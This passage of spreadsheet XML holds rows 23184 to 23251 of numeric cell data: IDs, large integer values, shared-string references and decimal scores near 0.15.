      <c r="A23184" s="1">
        <v>33811.0</v>
      </c>
      <c r="B23184" s="2">
        <v>8887270.0</v>
      </c>
      <c r="C23184" s="2" t="s">
        <v>22378</v>
      </c>
      <c r="D23184" s="2">
        <v>1.0</v>
      </c>
      <c r="E23184" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23184" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="23185" ht="15.75" customHeight="1">
      <c r="A23185" s="1">
        <v>15679.0</v>
      </c>
      <c r="B23185" s="2">
        <v>4.3825033E7</v>
      </c>
      <c r="C23185" s="2" t="s">
        <v>22379</v>
      </c>
      <c r="D23185" s="2">
        <v>1.0</v>
      </c>
      <c r="E23185" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23185" s="2">
        <v>0.1546296296296297</v>
      </c>
    </row>
    <row r="23186" ht="15.75" customHeight="1">
      <c r="A23186" s="1">
        <v>20313.0</v>
      </c>
      <c r="B23186" s="2">
        <v>1.1419207E7</v>
      </c>
      <c r="C23186" s="2" t="s">
        <v>22380</v>
      </c>
      <c r="D23186" s="2">
        <v>1.0</v>
      </c>
      <c r="E23186" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23186" s="2">
        <v>0.1546296296296297</v>
      </c>
    </row>
    <row r="23187" ht="15.75" customHeight="1">
      <c r="A23187" s="1">
        <v>24600.0</v>
      </c>
      <c r="B23187" s="2">
        <v>1.1419206E7</v>
      </c>
      <c r="C23187" s="2" t="s">
        <v>22380</v>
      </c>
      <c r="D23187" s="2">
        <v>1.0</v>
      </c>
      <c r="E23187" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23187" s="2">
        <v>0.1546296296296297</v>
      </c>
    </row>
    <row r="23188" ht="15.75" customHeight="1">
      <c r="A23188" s="1">
        <v>24978.0</v>
      </c>
      <c r="B23188" s="2">
        <v>1.2676985E7</v>
      </c>
      <c r="C23188" s="2" t="s">
        <v>22381</v>
      </c>
      <c r="D23188" s="2">
        <v>1.0</v>
      </c>
      <c r="E23188" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23188" s="2">
        <v>0.1546296296296297</v>
      </c>
    </row>
    <row r="23189" ht="15.75" customHeight="1">
      <c r="A23189" s="1">
        <v>31606.0</v>
      </c>
      <c r="B23189" s="2">
        <v>5135360.0</v>
      </c>
      <c r="C23189" s="2" t="s">
        <v>22382</v>
      </c>
      <c r="D23189" s="2">
        <v>1.0</v>
      </c>
      <c r="E23189" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23189" s="2">
        <v>0.1545454545454545</v>
      </c>
    </row>
    <row r="23190" ht="15.75" customHeight="1">
      <c r="A23190" s="1">
        <v>20610.0</v>
      </c>
      <c r="B23190" s="2">
        <v>1.3966234E7</v>
      </c>
      <c r="C23190" s="2" t="s">
        <v>22383</v>
      </c>
      <c r="D23190" s="2">
        <v>1.0</v>
      </c>
      <c r="E23190" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23190" s="2">
        <v>0.1543209876543211</v>
      </c>
    </row>
    <row r="23191" ht="15.75" customHeight="1">
      <c r="A23191" s="1">
        <v>27075.0</v>
      </c>
      <c r="B23191" s="2">
        <v>2.0447421E7</v>
      </c>
      <c r="C23191" s="2" t="s">
        <v>22384</v>
      </c>
      <c r="D23191" s="2">
        <v>1.0</v>
      </c>
      <c r="E23191" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23191" s="2">
        <v>0.1543209876543211</v>
      </c>
    </row>
    <row r="23192" ht="15.75" customHeight="1">
      <c r="A23192" s="1">
        <v>22726.0</v>
      </c>
      <c r="B23192" s="2">
        <v>4.3799724E7</v>
      </c>
      <c r="C23192" s="2" t="s">
        <v>22385</v>
      </c>
      <c r="D23192" s="2">
        <v>1.0</v>
      </c>
      <c r="E23192" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23192" s="2">
        <v>0.1542145593869733</v>
      </c>
    </row>
    <row r="23193" ht="15.75" customHeight="1">
      <c r="A23193" s="1">
        <v>32553.0</v>
      </c>
      <c r="B23193" s="2">
        <v>5755744.0</v>
      </c>
      <c r="C23193" s="2" t="s">
        <v>22343</v>
      </c>
      <c r="D23193" s="2">
        <v>1.0</v>
      </c>
      <c r="E23193" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23193" s="2">
        <v>0.1542145593869733</v>
      </c>
    </row>
    <row r="23194" ht="15.75" customHeight="1">
      <c r="A23194" s="1">
        <v>33877.0</v>
      </c>
      <c r="B23194" s="2">
        <v>9110522.0</v>
      </c>
      <c r="C23194" s="2" t="s">
        <v>22386</v>
      </c>
      <c r="D23194" s="2">
        <v>1.0</v>
      </c>
      <c r="E23194" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23194" s="2">
        <v>0.1539162112932605</v>
      </c>
    </row>
    <row r="23195" ht="15.75" customHeight="1">
      <c r="A23195" s="1">
        <v>20447.0</v>
      </c>
      <c r="B23195" s="2">
        <v>1.2457638E7</v>
      </c>
      <c r="C23195" s="2" t="s">
        <v>22387</v>
      </c>
      <c r="D23195" s="2">
        <v>1.0</v>
      </c>
      <c r="E23195" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23195" s="2">
        <v>0.1537698412698413</v>
      </c>
    </row>
    <row r="23196" ht="15.75" customHeight="1">
      <c r="A23196" s="1">
        <v>28676.0</v>
      </c>
      <c r="B23196" s="2">
        <v>2.7543624E7</v>
      </c>
      <c r="C23196" s="2" t="s">
        <v>22388</v>
      </c>
      <c r="D23196" s="2">
        <v>1.0</v>
      </c>
      <c r="E23196" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23196" s="2">
        <v>0.1536458333333334</v>
      </c>
    </row>
    <row r="23197" ht="15.75" customHeight="1">
      <c r="A23197" s="1">
        <v>31649.0</v>
      </c>
      <c r="B23197" s="2">
        <v>5.1591105E7</v>
      </c>
      <c r="C23197" s="2" t="s">
        <v>22389</v>
      </c>
      <c r="D23197" s="2">
        <v>1.0</v>
      </c>
      <c r="E23197" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23197" s="2">
        <v>0.1536458333333334</v>
      </c>
    </row>
    <row r="23198" ht="15.75" customHeight="1">
      <c r="A23198" s="1">
        <v>13155.0</v>
      </c>
      <c r="B23198" s="2">
        <v>3.3828746E7</v>
      </c>
      <c r="C23198" s="2" t="s">
        <v>22390</v>
      </c>
      <c r="D23198" s="2">
        <v>1.0</v>
      </c>
      <c r="E23198" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23198" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="23199" ht="15.75" customHeight="1">
      <c r="A23199" s="1">
        <v>20585.0</v>
      </c>
      <c r="B23199" s="2">
        <v>1.3722388E7</v>
      </c>
      <c r="C23199" s="2" t="s">
        <v>22361</v>
      </c>
      <c r="D23199" s="2">
        <v>1.0</v>
      </c>
      <c r="E23199" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23199" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="23200" ht="15.75" customHeight="1">
      <c r="A23200" s="1">
        <v>33928.0</v>
      </c>
      <c r="B23200" s="2">
        <v>9281881.0</v>
      </c>
      <c r="C23200" s="2" t="s">
        <v>22391</v>
      </c>
      <c r="D23200" s="2">
        <v>1.0</v>
      </c>
      <c r="E23200" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23200" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="23201" ht="15.75" customHeight="1">
      <c r="A23201" s="1">
        <v>22589.0</v>
      </c>
      <c r="B23201" s="2">
        <v>3.9098987E7</v>
      </c>
      <c r="C23201" s="2" t="s">
        <v>22392</v>
      </c>
      <c r="D23201" s="2">
        <v>1.0</v>
      </c>
      <c r="E23201" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23201" s="2">
        <v>0.1530214424951268</v>
      </c>
    </row>
    <row r="23202" ht="15.75" customHeight="1">
      <c r="A23202" s="1">
        <v>22813.0</v>
      </c>
      <c r="B23202" s="2">
        <v>4.6124803E7</v>
      </c>
      <c r="C23202" s="2" t="s">
        <v>22393</v>
      </c>
      <c r="D23202" s="2">
        <v>1.0</v>
      </c>
      <c r="E23202" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23202" s="2">
        <v>0.1530214424951268</v>
      </c>
    </row>
    <row r="23203" ht="15.75" customHeight="1">
      <c r="A23203" s="1">
        <v>23901.0</v>
      </c>
      <c r="B23203" s="2">
        <v>8481169.0</v>
      </c>
      <c r="C23203" s="2" t="s">
        <v>22394</v>
      </c>
      <c r="D23203" s="2">
        <v>1.0</v>
      </c>
      <c r="E23203" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23203" s="2">
        <v>0.152991452991453</v>
      </c>
    </row>
    <row r="23204" ht="15.75" customHeight="1">
      <c r="A23204" s="1">
        <v>29078.0</v>
      </c>
      <c r="B23204" s="2">
        <v>3.032875E7</v>
      </c>
      <c r="C23204" s="2" t="s">
        <v>22395</v>
      </c>
      <c r="D23204" s="2">
        <v>1.0</v>
      </c>
      <c r="E23204" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23204" s="2">
        <v>0.152991452991453</v>
      </c>
    </row>
    <row r="23205" ht="15.75" customHeight="1">
      <c r="A23205" s="1">
        <v>21921.0</v>
      </c>
      <c r="B23205" s="2">
        <v>2.8379055E7</v>
      </c>
      <c r="C23205" s="2" t="s">
        <v>22396</v>
      </c>
      <c r="D23205" s="2">
        <v>1.0</v>
      </c>
      <c r="E23205" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23205" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="23206" ht="15.75" customHeight="1">
      <c r="A23206" s="1">
        <v>22724.0</v>
      </c>
      <c r="B23206" s="2">
        <v>4.3678955E7</v>
      </c>
      <c r="C23206" s="2" t="s">
        <v>22397</v>
      </c>
      <c r="D23206" s="2">
        <v>1.0</v>
      </c>
      <c r="E23206" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23206" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="23207" ht="15.75" customHeight="1">
      <c r="A23207" s="1">
        <v>24864.0</v>
      </c>
      <c r="B23207" s="2">
        <v>1.2208325E7</v>
      </c>
      <c r="C23207" s="2" t="s">
        <v>22398</v>
      </c>
      <c r="D23207" s="2">
        <v>1.0</v>
      </c>
      <c r="E23207" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23207" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="23208" ht="15.75" customHeight="1">
      <c r="A23208" s="1">
        <v>26683.0</v>
      </c>
      <c r="B23208" s="2">
        <v>1.8100553E7</v>
      </c>
      <c r="C23208" s="2" t="s">
        <v>22399</v>
      </c>
      <c r="D23208" s="2">
        <v>1.0</v>
      </c>
      <c r="E23208" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23208" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="23209" ht="15.75" customHeight="1">
      <c r="A23209" s="1">
        <v>26776.0</v>
      </c>
      <c r="B23209" s="2">
        <v>1.8498653E7</v>
      </c>
      <c r="C23209" s="2" t="s">
        <v>22400</v>
      </c>
      <c r="D23209" s="2">
        <v>1.0</v>
      </c>
      <c r="E23209" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23209" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="23210" ht="15.75" customHeight="1">
      <c r="A23210" s="1">
        <v>26804.0</v>
      </c>
      <c r="B23210" s="2">
        <v>1.866912E7</v>
      </c>
      <c r="C23210" s="2" t="s">
        <v>22401</v>
      </c>
      <c r="D23210" s="2">
        <v>1.0</v>
      </c>
      <c r="E23210" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23210" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="23211" ht="15.75" customHeight="1">
      <c r="A23211" s="1">
        <v>27159.0</v>
      </c>
      <c r="B23211" s="2">
        <v>2.0809486E7</v>
      </c>
      <c r="C23211" s="2" t="s">
        <v>22402</v>
      </c>
      <c r="D23211" s="2">
        <v>1.0</v>
      </c>
      <c r="E23211" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23211" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="23212" ht="15.75" customHeight="1">
      <c r="A23212" s="1">
        <v>27403.0</v>
      </c>
      <c r="B23212" s="2">
        <v>2.1801437E7</v>
      </c>
      <c r="C23212" s="2" t="s">
        <v>22403</v>
      </c>
      <c r="D23212" s="2">
        <v>1.0</v>
      </c>
      <c r="E23212" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23212" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="23213" ht="15.75" customHeight="1">
      <c r="A23213" s="1">
        <v>28673.0</v>
      </c>
      <c r="B23213" s="2">
        <v>2.7533656E7</v>
      </c>
      <c r="C23213" s="2" t="s">
        <v>22402</v>
      </c>
      <c r="D23213" s="2">
        <v>1.0</v>
      </c>
      <c r="E23213" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23213" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="23214" ht="15.75" customHeight="1">
      <c r="A23214" s="1">
        <v>30726.0</v>
      </c>
      <c r="B23214" s="2">
        <v>4.3678954E7</v>
      </c>
      <c r="C23214" s="2" t="s">
        <v>22397</v>
      </c>
      <c r="D23214" s="2">
        <v>1.0</v>
      </c>
      <c r="E23214" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23214" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="23215" ht="15.75" customHeight="1">
      <c r="A23215" s="1">
        <v>31204.0</v>
      </c>
      <c r="B23215" s="2">
        <v>4922784.0</v>
      </c>
      <c r="C23215" s="2" t="s">
        <v>22404</v>
      </c>
      <c r="D23215" s="2">
        <v>1.0</v>
      </c>
      <c r="E23215" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23215" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="23216" ht="15.75" customHeight="1">
      <c r="A23216" s="1">
        <v>33564.0</v>
      </c>
      <c r="B23216" s="2">
        <v>8219954.0</v>
      </c>
      <c r="C23216" s="2" t="s">
        <v>22405</v>
      </c>
      <c r="D23216" s="2">
        <v>1.0</v>
      </c>
      <c r="E23216" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23216" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="23217" ht="15.75" customHeight="1">
      <c r="A23217" s="1">
        <v>31570.0</v>
      </c>
      <c r="B23217" s="2">
        <v>5122648.0</v>
      </c>
      <c r="C23217" s="2" t="s">
        <v>22406</v>
      </c>
      <c r="D23217" s="2">
        <v>1.0</v>
      </c>
      <c r="E23217" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23217" s="2">
        <v>0.1525821596244132</v>
      </c>
    </row>
    <row r="23218" ht="15.75" customHeight="1">
      <c r="A23218" s="1">
        <v>25805.0</v>
      </c>
      <c r="B23218" s="2">
        <v>1.4733692E7</v>
      </c>
      <c r="C23218" s="2" t="s">
        <v>22407</v>
      </c>
      <c r="D23218" s="2">
        <v>1.0</v>
      </c>
      <c r="E23218" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23218" s="2">
        <v>0.1523569023569024</v>
      </c>
    </row>
    <row r="23219" ht="15.75" customHeight="1">
      <c r="A23219" s="1">
        <v>32082.0</v>
      </c>
      <c r="B23219" s="2">
        <v>5387912.0</v>
      </c>
      <c r="C23219" s="2" t="s">
        <v>22408</v>
      </c>
      <c r="D23219" s="2">
        <v>1.0</v>
      </c>
      <c r="E23219" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23219" s="2">
        <v>0.1522988505747127</v>
      </c>
    </row>
    <row r="23220" ht="15.75" customHeight="1">
      <c r="A23220" s="1">
        <v>30984.0</v>
      </c>
      <c r="B23220" s="2">
        <v>4.755862E7</v>
      </c>
      <c r="C23220" s="2" t="s">
        <v>22409</v>
      </c>
      <c r="D23220" s="2">
        <v>1.0</v>
      </c>
      <c r="E23220" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23220" s="2">
        <v>0.1520146520146521</v>
      </c>
    </row>
    <row r="23221" ht="15.75" customHeight="1">
      <c r="A23221" s="1">
        <v>33903.0</v>
      </c>
      <c r="B23221" s="2">
        <v>9215150.0</v>
      </c>
      <c r="C23221" s="2" t="s">
        <v>22410</v>
      </c>
      <c r="D23221" s="2">
        <v>1.0</v>
      </c>
      <c r="E23221" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23221" s="2">
        <v>0.1517412935323384</v>
      </c>
    </row>
    <row r="23222" ht="15.75" customHeight="1">
      <c r="A23222" s="1">
        <v>22788.0</v>
      </c>
      <c r="B23222" s="2">
        <v>4541323.0</v>
      </c>
      <c r="C23222" s="2" t="s">
        <v>22411</v>
      </c>
      <c r="D23222" s="2">
        <v>1.0</v>
      </c>
      <c r="E23222" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23222" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="23223" ht="15.75" customHeight="1">
      <c r="A23223" s="1">
        <v>30439.0</v>
      </c>
      <c r="B23223" s="2">
        <v>3.9098986E7</v>
      </c>
      <c r="C23223" s="2" t="s">
        <v>22412</v>
      </c>
      <c r="D23223" s="2">
        <v>1.0</v>
      </c>
      <c r="E23223" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23223" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="23224" ht="15.75" customHeight="1">
      <c r="A23224" s="1">
        <v>24623.0</v>
      </c>
      <c r="B23224" s="2">
        <v>1.1460893E7</v>
      </c>
      <c r="C23224" s="2" t="s">
        <v>22413</v>
      </c>
      <c r="D23224" s="2">
        <v>1.0</v>
      </c>
      <c r="E23224" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23224" s="2">
        <v>0.1512820512820513</v>
      </c>
    </row>
    <row r="23225" ht="15.75" customHeight="1">
      <c r="A23225" s="1">
        <v>33875.0</v>
      </c>
      <c r="B23225" s="2">
        <v>9110522.0</v>
      </c>
      <c r="C23225" s="2" t="s">
        <v>22414</v>
      </c>
      <c r="D23225" s="2">
        <v>1.0</v>
      </c>
      <c r="E23225" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23225" s="2">
        <v>0.1512820512820513</v>
      </c>
    </row>
    <row r="23226" ht="15.75" customHeight="1">
      <c r="A23226" s="1">
        <v>20309.0</v>
      </c>
      <c r="B23226" s="2">
        <v>1.1378949E7</v>
      </c>
      <c r="C23226" s="2" t="s">
        <v>22415</v>
      </c>
      <c r="D23226" s="2">
        <v>1.0</v>
      </c>
      <c r="E23226" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23226" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="23227" ht="15.75" customHeight="1">
      <c r="A23227" s="1">
        <v>28645.0</v>
      </c>
      <c r="B23227" s="2">
        <v>2.7322414E7</v>
      </c>
      <c r="C23227" s="2" t="s">
        <v>22416</v>
      </c>
      <c r="D23227" s="2">
        <v>1.0</v>
      </c>
      <c r="E23227" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23227" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="23228" ht="15.75" customHeight="1">
      <c r="A23228" s="1">
        <v>33543.0</v>
      </c>
      <c r="B23228" s="2">
        <v>8169427.0</v>
      </c>
      <c r="C23228" s="2" t="s">
        <v>22417</v>
      </c>
      <c r="D23228" s="2">
        <v>1.0</v>
      </c>
      <c r="E23228" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23228" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="23229" ht="15.75" customHeight="1">
      <c r="A23229" s="1">
        <v>22427.0</v>
      </c>
      <c r="B23229" s="2">
        <v>3.6154101E7</v>
      </c>
      <c r="C23229" s="2" t="s">
        <v>22418</v>
      </c>
      <c r="D23229" s="2">
        <v>1.0</v>
      </c>
      <c r="E23229" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23229" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="23230" ht="15.75" customHeight="1">
      <c r="A23230" s="1">
        <v>23534.0</v>
      </c>
      <c r="B23230" s="2">
        <v>5932978.0</v>
      </c>
      <c r="C23230" s="2" t="s">
        <v>22419</v>
      </c>
      <c r="D23230" s="2">
        <v>1.0</v>
      </c>
      <c r="E23230" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23230" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="23231" ht="15.75" customHeight="1">
      <c r="A23231" s="1">
        <v>23545.0</v>
      </c>
      <c r="B23231" s="2">
        <v>6026867.0</v>
      </c>
      <c r="C23231" s="2" t="s">
        <v>22420</v>
      </c>
      <c r="D23231" s="2">
        <v>1.0</v>
      </c>
      <c r="E23231" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23231" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="23232" ht="15.75" customHeight="1">
      <c r="A23232" s="1">
        <v>23828.0</v>
      </c>
      <c r="B23232" s="2">
        <v>8049713.0</v>
      </c>
      <c r="C23232" s="2" t="s">
        <v>22421</v>
      </c>
      <c r="D23232" s="2">
        <v>1.0</v>
      </c>
      <c r="E23232" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23232" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="23233" ht="15.75" customHeight="1">
      <c r="A23233" s="1">
        <v>25611.0</v>
      </c>
      <c r="B23233" s="2">
        <v>1.440173E7</v>
      </c>
      <c r="C23233" s="2" t="s">
        <v>22422</v>
      </c>
      <c r="D23233" s="2">
        <v>1.0</v>
      </c>
      <c r="E23233" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23233" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="23234" ht="15.75" customHeight="1">
      <c r="A23234" s="1">
        <v>27577.0</v>
      </c>
      <c r="B23234" s="2">
        <v>2.250173E7</v>
      </c>
      <c r="C23234" s="2" t="s">
        <v>22423</v>
      </c>
      <c r="D23234" s="2">
        <v>1.0</v>
      </c>
      <c r="E23234" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23234" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="23235" ht="15.75" customHeight="1">
      <c r="A23235" s="1">
        <v>30011.0</v>
      </c>
      <c r="B23235" s="2">
        <v>3.61541E7</v>
      </c>
      <c r="C23235" s="2" t="s">
        <v>22418</v>
      </c>
      <c r="D23235" s="2">
        <v>1.0</v>
      </c>
      <c r="E23235" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23235" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="23236" ht="15.75" customHeight="1">
      <c r="A23236" s="1">
        <v>31205.0</v>
      </c>
      <c r="B23236" s="2">
        <v>4922784.0</v>
      </c>
      <c r="C23236" s="2" t="s">
        <v>22424</v>
      </c>
      <c r="D23236" s="2">
        <v>1.0</v>
      </c>
      <c r="E23236" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23236" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="23237" ht="15.75" customHeight="1">
      <c r="A23237" s="1">
        <v>31282.0</v>
      </c>
      <c r="B23237" s="2">
        <v>4960496.0</v>
      </c>
      <c r="C23237" s="2" t="s">
        <v>22425</v>
      </c>
      <c r="D23237" s="2">
        <v>1.0</v>
      </c>
      <c r="E23237" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23237" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="23238" ht="15.75" customHeight="1">
      <c r="A23238" s="1">
        <v>32263.0</v>
      </c>
      <c r="B23238" s="2">
        <v>5.5164234E7</v>
      </c>
      <c r="C23238" s="2" t="s">
        <v>22426</v>
      </c>
      <c r="D23238" s="2">
        <v>1.0</v>
      </c>
      <c r="E23238" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23238" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="23239" ht="15.75" customHeight="1">
      <c r="A23239" s="1">
        <v>24997.0</v>
      </c>
      <c r="B23239" s="2">
        <v>1.2690786E7</v>
      </c>
      <c r="C23239" s="2" t="s">
        <v>22427</v>
      </c>
      <c r="D23239" s="2">
        <v>1.0</v>
      </c>
      <c r="E23239" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23239" s="2">
        <v>0.1500000000000001</v>
      </c>
    </row>
    <row r="23240" ht="15.75" customHeight="1">
      <c r="A23240" s="1">
        <v>28919.0</v>
      </c>
      <c r="B23240" s="2">
        <v>2.9524788E7</v>
      </c>
      <c r="C23240" s="2" t="s">
        <v>22428</v>
      </c>
      <c r="D23240" s="2">
        <v>1.0</v>
      </c>
      <c r="E23240" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23240" s="2">
        <v>0.149923896499239</v>
      </c>
    </row>
    <row r="23241" ht="15.75" customHeight="1">
      <c r="A23241" s="1">
        <v>31637.0</v>
      </c>
      <c r="B23241" s="2">
        <v>5146881.0</v>
      </c>
      <c r="C23241" s="2" t="s">
        <v>22429</v>
      </c>
      <c r="D23241" s="2">
        <v>1.0</v>
      </c>
      <c r="E23241" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23241" s="2">
        <v>0.1498015873015874</v>
      </c>
    </row>
    <row r="23242" ht="15.75" customHeight="1">
      <c r="A23242" s="1">
        <v>27029.0</v>
      </c>
      <c r="B23242" s="2">
        <v>2.0065395E7</v>
      </c>
      <c r="C23242" s="2" t="s">
        <v>22430</v>
      </c>
      <c r="D23242" s="2">
        <v>1.0</v>
      </c>
      <c r="E23242" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23242" s="2">
        <v>0.1497175141242938</v>
      </c>
    </row>
    <row r="23243" ht="15.75" customHeight="1">
      <c r="A23243" s="1">
        <v>32744.0</v>
      </c>
      <c r="B23243" s="2">
        <v>6041936.0</v>
      </c>
      <c r="C23243" s="2" t="s">
        <v>22431</v>
      </c>
      <c r="D23243" s="2">
        <v>1.0</v>
      </c>
      <c r="E23243" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23243" s="2">
        <v>0.1497175141242938</v>
      </c>
    </row>
    <row r="23244" ht="15.75" customHeight="1">
      <c r="A23244" s="1">
        <v>28538.0</v>
      </c>
      <c r="B23244" s="2">
        <v>2.6815849E7</v>
      </c>
      <c r="C23244" s="2" t="s">
        <v>22432</v>
      </c>
      <c r="D23244" s="2">
        <v>1.0</v>
      </c>
      <c r="E23244" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23244" s="2">
        <v>0.149641577060932</v>
      </c>
    </row>
    <row r="23245" ht="15.75" customHeight="1">
      <c r="A23245" s="1">
        <v>28707.0</v>
      </c>
      <c r="B23245" s="2">
        <v>2.7766518E7</v>
      </c>
      <c r="C23245" s="2" t="s">
        <v>22433</v>
      </c>
      <c r="D23245" s="2">
        <v>1.0</v>
      </c>
      <c r="E23245" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23245" s="2">
        <v>0.149641577060932</v>
      </c>
    </row>
    <row r="23246" ht="15.75" customHeight="1">
      <c r="A23246" s="1">
        <v>28670.0</v>
      </c>
      <c r="B23246" s="2">
        <v>2.7511131E7</v>
      </c>
      <c r="C23246" s="2" t="s">
        <v>22434</v>
      </c>
      <c r="D23246" s="2">
        <v>1.0</v>
      </c>
      <c r="E23246" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23246" s="2">
        <v>0.1495098039215687</v>
      </c>
    </row>
    <row r="23247" ht="15.75" customHeight="1">
      <c r="A23247" s="1">
        <v>20834.0</v>
      </c>
      <c r="B23247" s="2">
        <v>1.5535829E7</v>
      </c>
      <c r="C23247" s="2" t="s">
        <v>22435</v>
      </c>
      <c r="D23247" s="2">
        <v>1.0</v>
      </c>
      <c r="E23247" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23247" s="2">
        <v>0.1491769547325103</v>
      </c>
    </row>
    <row r="23248" ht="15.75" customHeight="1">
      <c r="A23248" s="1">
        <v>33247.0</v>
      </c>
      <c r="B23248" s="2">
        <v>7320610.0</v>
      </c>
      <c r="C23248" s="2" t="s">
        <v>22436</v>
      </c>
      <c r="D23248" s="2">
        <v>1.0</v>
      </c>
      <c r="E23248" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23248" s="2">
        <v>0.1491769547325103</v>
      </c>
    </row>
    <row r="23249" ht="15.75" customHeight="1">
      <c r="A23249" s="1">
        <v>23184.0</v>
      </c>
      <c r="B23249" s="2">
        <v>5.2325111E7</v>
      </c>
      <c r="C23249" s="2" t="s">
        <v>22437</v>
      </c>
      <c r="D23249" s="2">
        <v>1.0</v>
      </c>
      <c r="E23249" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23249" s="2">
        <v>0.1491228070175439</v>
      </c>
    </row>
    <row r="23250" ht="15.75" customHeight="1">
      <c r="A23250" s="1">
        <v>24591.0</v>
      </c>
      <c r="B23250" s="2">
        <v>1.1378948E7</v>
      </c>
      <c r="C23250" s="2" t="s">
        <v>22415</v>
      </c>
      <c r="D23250" s="2">
        <v>1.0</v>
      </c>
      <c r="E23250" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23250" s="2">
        <v>0.1490740740740741</v>
      </c>
    </row>
    <row r="23251" ht="15.75" customHeight="1">
      <c r="A23251" s="1">
        <v>20629.0</v>
      </c>
      <c r="B23251" s="2">
